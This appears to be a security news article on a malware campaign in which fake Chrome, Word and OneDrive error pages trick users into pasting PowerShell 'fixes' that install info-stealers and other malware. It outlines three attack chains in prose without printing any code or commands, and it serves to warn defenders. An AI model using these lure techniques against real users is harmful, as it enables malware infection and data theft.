A recent malware distribution campaign has been identified, leveraging fake error messages in Google Chrome, Microsoft Word, and OneDrive to deceive users into executing malicious PowerShell "fixes" that install malware. This campaign has been observed being utilised by multiple threat actors, including ClearFake, the newly identified ClickFix attack cluster, and the notorious TA571 group, known for mass spam distribution leading to malware and ransomware infections.
Historically, ClearFake attacks have used website overlays to prompt users to install fake browser updates that, in reality, deploy malware. In this new wave of attacks, threat actors are employing JavaScript in HTML attachments and compromised websites to deliver their malicious payloads. These sophisticated overlays now mimic legitimate error messages from Google Chrome, Microsoft Word, and OneDrive.
The deceptive error messages instruct users to click a button that copies a PowerShell "fix" to their clipboard. Users are then prompted to paste and execute this script in a Run dialog or PowerShell prompt. While this attack chain necessitates significant user interaction, the social engineering tactics employed are highly effective. The presented errors and solutions appear genuine, potentially compelling users to act without fully considering the associated risks.
A recent report highlights the severity of these attacks, noting that the payloads identified include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer. The report emphasises the cleverness of the social engineering techniques, which can easily mislead users into inadvertently compromising their systems.
As this threat evolves, it is crucial for users to remain vigilant and sceptical of unexpected error messages and prompts, especially those involving PowerShell scripts. Cyber security awareness and education are vital in combating such sophisticated attacks and protecting sensitive data from malicious actors.
Malicious PowerShell 'Fix' Installs Malware
Analysts have identified three distinct attack chains, primarily differentiated by their initial stages, with only the first not being conclusively attributed to the TA571 threat group.
In the first scenario, associated with the ClearFake threat actors, users encounter compromised websites that load a malicious script via Binance's Smart Chain contracts on the blockchain. This script conducts preliminary checks and displays a fraudulent Google Chrome warning, claiming an issue with webpage display. The user is then prompted to install a "root certificate" by copying a PowerShell script to the Windows Clipboard and executing it in a Windows PowerShell (Admin) console. Upon execution, the script performs several actions to validate the target device before downloading additional payloads, including:
• Flushing the DNS cache.
• Clearing the clipboard content.
• Displaying a decoy message.
• Downloading a remote PowerShell script that conducts anti-VM checks and then downloads an info-stealer.
The second attack chain, linked to the 'ClickFix' campaign, involves injecting code into compromised websites to create an iframe overlay with another fake Google Chrome error. Users are instructed to open "Windows PowerShell (Admin)" and paste the provided code, resulting in the same infections as mentioned previously.
The third attack chain employs an email-based vector with HTML attachments designed to resemble Microsoft Word documents. These attachments prompt users to install the "Word Online" extension to view the document correctly. The error message offers "How to fix" and "Auto-fix" options. The "How to fix" option copies a base64-encoded PowerShell command to the clipboard, instructing the user to paste it into PowerShell. The "Auto-fix" option uses the search-ms protocol to display a WebDAV-hosted "fix.msi" or "fix.vbs" file from a remote attacker-controlled file share. These PowerShell commands ultimately download and execute either an MSI file or a VBS script, leading to infections by Matanbuchus or DarkGate, respectively.
To Sum Up
Across all these attack vectors, threat actors exploit user ignorance regarding the dangers of executing PowerShell commands. They also leverage the inability of Windows systems to detect and block the malicious actions initiated by these scripts. The varied methodologies employed by TA571 indicate an active effort to enhance their attack efficacy and discover new infection pathways to compromise a larger number of systems. By understanding these evolving threats and implementing robust security practices, organisations can better protect their systems from these sophisticated attack chains.
